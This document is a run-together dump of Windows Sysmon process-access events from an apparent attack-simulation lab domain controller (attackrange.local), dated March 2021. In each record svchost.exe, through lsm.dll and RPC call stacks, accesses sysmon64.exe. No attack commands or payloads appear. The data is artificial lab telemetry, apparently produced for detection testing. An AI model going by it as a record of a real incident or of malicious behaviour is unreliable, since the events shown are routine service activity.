12:01:01.598{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001786Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.598{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001785Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.598{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001784Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001783Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001782Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001781Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001780Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001779Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001778Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001777Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001776Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001775Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001774Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001773Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001772Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001771Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001770Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001769Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001768Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001767Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001766Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001765Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001764Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001763Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 